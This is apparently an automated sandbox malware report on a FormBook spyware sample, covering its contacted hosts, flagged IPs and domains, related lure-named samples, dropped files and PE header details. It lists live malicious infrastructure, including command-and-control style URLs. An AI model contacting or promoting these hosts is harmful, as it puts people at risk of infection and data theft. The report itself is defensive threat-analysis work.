                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://htmlcodex.comwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/chrome_newtabwrite.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://duckduckgo.com/ac/?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.jsdelivr.net/npm/bootstrapwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.csswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.zoho.com/sites/images/professionally-crafted-themes.pngwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        http://www.polarmuseum.infofZXsbVktlmkz.exe, 00000007.00000002.3554169610.0000000004A7C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://code.jquery.com/jquery-3.4.1.min.jswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.ecosia.org/newtab/write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.techwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://cdn.jsdelivr.net/npm/bootstrap-iconswrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumbwrite.exe, 00000006.00000002.3553914086.000000000531A000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002E7A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://htmlcodex.com/credit-removalwrite.exe, 00000006.00000002.3553914086.0000000005188000.00000004.10000000.00040000.00000000.sdmp, fZXsbVktlmkz.exe, 00000007.00000002.3552346753.0000000002CE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000006.00000002.3555877402.000000000759E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            209.74.95.29
                                                                            		www.onemart.siteUnited States
                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                            136.143.186.12
                                                                            		zhs.zohosites.comUnited States
                                                                            		2639ZOHO-ASUSfalse
                                                                            13.248.169.48
                                                                            		www.polarmuseum.infoUnited States
                                                                            		16509AMAZON-02UStrue
                                                                            161.97.142.144
                                                                            		www.030002304.xyzUnited States
                                                                            		51167CONTABODEtrue
                                                                            172.96.187.60
                                                                            		dalong.siteCanada
                                                                            		32475SINGLEHOP-LLCUStrue
                                                                            133.130.35.90
                                                                            		komart.shopJapan7506INTERQGMOInternetIncJPtrue
                                                                            31.31.196.17
                                                                            		www.dverkom.storeRussian Federation
                                                                            		197695AS-REGRUtrue
                                                                            3.33.130.190
                                                                            		teerra.shopUnited States
                                                                            		8987AMAZONEXPANSIONGBtrue
                                                                            154.23.184.60
                                                                            		wcm50.topUnited States
                                                                            		174COGENT-174UStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1549349
                                                                            Start date and time:2024-11-05 15:21:08 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 9m 27s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Run name:Run with higher sleep bypass
                                                                            Number of analysed new started processes analysed:8
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:2
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:r6lOHDg9N9.exe
                                                                            renamed because original name is a hash value
                                                                            Original Sample Name:bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@11/9
                                                                            EGA Information:
                                                                            • Successful, ratio: 75%
                                                                            HCA Information:
                                                                            • Successful, ratio: 96%
                                                                            • Number of executed functions: 41
                                                                            • Number of non-executed functions: 314
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                            • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target fZXsbVktlmkz.exe, PID 1228 because it is empty
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: r6lOHDg9N9.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            09:23:18API Interceptor5723356x Sleep call for process: write.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            209.74.95.29PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            POPO00003964.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/?86_x=PbxAaK8rSTbGZ+BXmINHlCmvDMYzd7cnW5ERHNgbkCm+3sg74DzBCzS1WsCQlDZBoOF+IY6Xn812UFXfTFX6/xo/4S63CIRytf8/LKIAqG5Hdl7pUAMfsfg=&bVi=_BPd
                                                                            YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.onetoph.xyz/h5ax/
                                                                            PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                            • www.sterkus.xyz/ha8h/
                                                                            PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                            • www.pofgof.pro/gfz9/
                                                                            136.143.186.12Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/1q08/
                                                                            jeez.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/m8yb/
                                                                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/1q08/
                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/ivo1/
                                                                            x.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/em49/
                                                                            bin.exeGet hashmaliciousFormBookBrowse
                                                                            • www.lanxuanz.tech/em49/
                                                                            PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                            • www.jrksa.info/nq8t/

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.polarmuseum.inforHSBCBank_Paymentswiftcpy.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            w64HYOhfv1.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            sa7Bw41TUq.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            enkJ6J7dAn.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            payment copy.exeGet hashmaliciousFormBookBrowse
                                                                            • 199.59.243.227
                                                                            zhs.zohosites.comPurchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            jeez.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            z4Shipping_document_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            x.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            bin.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            AMAZON-02USEmployee bonus and payroll 74ae5652.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 18.245.31.89
                                                                            https://bulbapp.com/u/sharefile?sharedLink=1db1fe96-5bdb-4c8c-ba45-33caa906abddGet hashmaliciousHTMLPhisherBrowse
                                                                            • 143.204.98.63
                                                                            Eveshaw.pdfGet hashmaliciousUnknownBrowse
                                                                            • 18.239.69.9
                                                                            https://bitbucket.org/thanksforusingourwebsite/serv/downloads/Statement-415322025.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            • 185.166.143.50
                                                                            https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                            • 76.223.1.166
                                                                            https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                            • 34.213.87.83
                                                                            https://forms.office.com/e/wqvhAuyrVUGet hashmaliciousHTMLPhisherBrowse
                                                                            • 13.32.118.71
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                            • 18.244.18.38
                                                                            https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                            • 185.166.143.49
                                                                            https://load.contbot.com.br/Get hashmaliciousUnknownBrowse
                                                                            • 76.76.21.21
                                                                            ZOHO-ASUSPurchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            https://workdrive.zohoexternal.com/file/d3qaw4673940b54374623b165953068c580b5Get hashmaliciousHTMLPhisherBrowse
                                                                            • 136.143.191.16
                                                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                            • 165.173.254.237
                                                                            https://www.pumpproducts.com/goulds-lb0735te-centrifugal-booster-pump-3-4-hp-208-230-460-volts-3-phase-1-1-4-npt-suction-1-npt-discharge-18-gpm-max-176-ft-max-head-5-impeller-tefc-stainless-steel-pump-end-casing.htmlGet hashmaliciousUnknownBrowse
                                                                            • 136.143.190.172
                                                                            https://www.google.hn/url?q=//www.google.ee/amp/s/h2f35e7.ubpages.com/bdeda8-f4eb-4ed8-bGet hashmaliciousHTMLPhisherBrowse
                                                                            • 136.143.190.123
                                                                            https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCEGet hashmaliciousUnknownBrowse
                                                                            • 136.143.182.97
                                                                            https://forms.zohopublic.com/infracon/form/Admin365/formperma/soOC4wKkJUgax5Rc4KZNGEn7_-YDqfLh02-40-_JjCEGet hashmaliciousUnknownBrowse
                                                                            • 136.143.182.97
                                                                            https://u47624652.ct.sendgrid.net/ls/click?upn=u001.dadsJCAJAl1i2Wyni-2FqIpB7JUgY2pex5g8M-2FhOTGFFHwo5sWgFDjcqy2L0OmonoaOFxcTz7SSB9Zef6mGbvSbZAXZK2FNhcmYdYC1XfrewJRXTzEzFwzmIj8nJoazHaAQVwyvlny49OkXm-2FDzbhWD3cqi52XZmuHNJ5erV06gLBXVvtoQCYY0OMkrHePY-2F9kOmRiOc8fRxBlNxNWWJDbU4O9z5P8IfXhDPiFYyln4kg-3DMEyt_ta3c1LGL-2F0rVfKZ7mVrwN6xsF1Wes8l2L7kiutKf8O1vhXHOMQAk657ifMzrLT5hR0wjO0bDDWiSyPYBMWem2YqbQ4hjbtaf8R6UfuK7GvGuvaOArNf0yRKKyAsKfoVrlXUbmkgYGBk7NXAN8n11wXOM8RDTicUs3dK12Mnhp63jlPtSTpECLklTQMdoXlI5m8IncC-2BD2wJgWDFrBq8JEg-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                                            • 204.141.42.123
                                                                            https://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfacGet hashmaliciousHTMLPhisherBrowse
                                                                            • 136.143.182.97
                                                                            jeez.exeGet hashmaliciousFormBookBrowse
                                                                            • 136.143.186.12
                                                                            MULTIBAND-NEWHOPEUS09Iz0ja549.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.190
                                                                            En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.187
                                                                            mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.189
                                                                            PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.190
                                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.58
                                                                            MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.58
                                                                            VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.187
                                                                            #10302024.exeGet hashmaliciousFormBookBrowse
                                                                            • 209.74.64.58
                                                                            http://1lyiqb.recodifyphone.net/#john.smith@ups.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                            • 209.74.95.101
                                                                            Biocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                            • 209.74.95.101
                                                                            CONTABODESECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            REVISED PO NO.8389.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 164.68.127.9
                                                                            COMMERCIAL-DOKUMEN-YANG-DIREVISI.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            evhopi.ps1Get hashmaliciousLummaCBrowse
                                                                            • 173.249.62.85
                                                                            Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                                                            • 161.97.132.254
                                                                            https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                                                            • 173.249.62.84
                                                                            Ponta Saheb. PO 4400049817.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            New Order list attached.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                            • 161.97.168.245
                                                                            A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144
                                                                            VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                            • 161.97.142.144

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Temp\O0-RJI-7

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\write.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                            Category:dropped
                                                                            Size (bytes):114688
                                                                            Entropy (8bit):0.9746603542602881
                                                                            Encrypted:false
                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Local\Temp\uppishly

                                                                            Download File
                                                                            Process:C:\Users\user\Desktop\r6lOHDg9N9.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):287744
                                                                            Entropy (8bit):7.994949598457176
                                                                            Encrypted:true
                                                                            SSDEEP:6144:yKFK1UgOExwPWioLF7AmbrPn6kPsRNuXtMtaBP5ix58xF:yxbxVL1zrPN0/0tjiWF
                                                                            MD5:074E4506270BBB0EE4A0A262B68FBFF8
                                                                            SHA1:B06AE4F399E47C2AB07DD936E7316C5B7C1FC4DC
                                                                            SHA-256:64381E9DEAD1108CD35A33718B3FB0CD69CA4DCEDB653EB06D44C8683558A1FF
                                                                            SHA-512:812A75C829D4322E182ED836889509DA7D6CFBEE3787B7E792E2D7DD1B7FB4F81F54D2991ECA11BFDFF2BBA2131BA85BEBBEAE3F98DC436E4C020AF2B926B647
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.i.j.OTQ3n.>....UN....RN...3X8AOTQ36PW7ORRR95UM0W29QFQ5H3.8AOZN.8P.>.s.Su.t.X>A.!4>R:R5.".:?\Bp5Ro '<.\;mt.a.<)5Pf>U2eOTQ36PWNN[.oYR.pP0..1!./..!(.K...kW(.H...i-W.`P2.lU/.X8AOTQ36..7O.SS9..^nW29QFQ5H.X:@DUZ36.S7ORRR95UM.C29QVQ5HC\8AO.Q3&PW7MRRT95UM0W2?QFQ5H3X81KTQ16PW7ORPRy.UM W2)QFQ5X3X(AOTQ36@W7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29Qh%P0GX8A..U36@W7O.VR9%UM0W29QFQ5H3X8aOT136PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7ORRR95UM0W29QFQ5H3X8AOTQ36PW7O

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.5185020842525345
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                            • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:r6lOHDg9N9.exe
                                                                            File size:1'339'905 bytes
                                                                            MD5:9f65c6e2192cc6757c1e7be556a4bc9a
                                                                            SHA1:c3f40bc0b721df2ac07997098ef6d9a8a8b4d290
                                                                            SHA256:bd12b7917d9fcc7512fa18d3546d728ec21c418f48a64333ec824937bd5b76c1
                                                                            SHA512:23c0b19323fea6ea5ee628d422c58404459a1feae442d78799dbfc2d5eb6b51ff8a21c80aac17e614fe82f893101436826191ca3dff99963259df625fb7bbf0f
                                                                            SSDEEP:24576:ffmMv6Ckr7Mny5QLF0H8hFCzhMUiQMC2XirYCcH/9ddSFi4YbXWTc:f3v+7/5QLLFCz+UV42YvH/97/ec
                                                                            TLSH:9555F112B7D680B2E9A339712977E327EB3576194327C4CBA7E02F768F211119B36361
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                            File Icon

                                                                            Icon Hash:1733312925935517

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x416310
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:5
                                                                            OS Version Minor:0
                                                                            File Version Major:5
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:5
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            call 00007F6FBCEC625Ch
                                                                            jmp 00007F6FBCEBA02Eh
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            push edi
                                                                            push esi
                                                                            mov esi, dword ptr [ebp+0Ch]
                                                                            mov ecx, dword ptr [ebp+10h]
                                                                            mov edi, dword ptr [ebp+08h]
                                                                            mov eax, ecx
                                                                            mov edx, ecx
                                                                            add eax, esi
                                                                            cmp edi, esi
                                                                            jbe 00007F6FBCEBA1BAh
                                                                            cmp edi, eax
                                                                            jc 00007F6FBCEBA35Ah
                                                                            cmp ecx, 00000100h
                                                                            jc 00007F6FBCEBA1D1h
                                                                            cmp dword ptr [004A94E0h], 00000000h
                                                                            je 00007F6FBCEBA1C8h
                                                                            push edi
                                                                            push esi
                                                                            and edi, 0Fh
                                                                            and esi, 0Fh
                                                                            cmp edi, esi
                                                                            pop esi
                                                                            pop edi
                                                                            jne 00007F6FBCEBA1BAh
                                                                            pop esi
                                                                            pop edi
                                                                            pop ebp
                                                                            jmp 00007F6FBCEBA61Ah
                                                                            test edi, 00000003h
                                                                            jne 00007F6FBCEBA1C7h
                                                                            shr ecx, 02h
                                                                            and edx, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F6FBCEBA1DCh
                                                                            rep movsd
                                                                            jmp dword ptr [00416494h+edx*4]
                                                                            nop
                                                                            mov eax, edi
                                                                            mov edx, 00000003h
                                                                            sub ecx, 04h
                                                                            jc 00007F6FBCEBA1BEh
                                                                            and eax, 03h
                                                                            add ecx, eax
                                                                            jmp dword ptr [004163A8h+eax*4]
                                                                            jmp dword ptr [004164A4h+ecx*4]
                                                                            nop
                                                                            jmp dword ptr [00416428h+ecx*4]
                                                                            nop
                                                                            mov eax, E4004163h
                                                                            arpl word ptr [ecx+00h], ax
                                                                            or byte ptr [ecx+eax*2+00h], ah
                                                                            and edx, ecx
                                                                            mov al, byte ptr [esi]
                                                                            mov byte ptr [edi], al
                                                                            mov al, byte ptr [esi+01h]
                                                                            mov byte ptr [edi+01h], al
                                                                            mov al, byte ptr [esi+02h]
                                                                            shr ecx, 02h
                                                                            mov byte ptr [edi+02h], al
                                                                            add esi, 03h
                                                                            add edi, 03h
                                                                            cmp ecx, 08h
                                                                            jc 00007F6FBCEBA17Eh

                                                                            Rich Headers

                                                                            Programming Language:
                                                                            • [ASM] VS2008 SP1 build 30729
                                                                            • [ C ] VS2008 SP1 build 30729
                                                                            • [C++] VS2008 SP1 build 30729
                                                                            • [ C ] VS2005 build 50727
                                                                            • [IMP] VS2005 build 50727
                                                                            • [ASM] VS2008 build 21022
                                                                            • [RES] VS2008 build 21022
                                                                            • [LNK] VS2008 SP1 build 30729

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
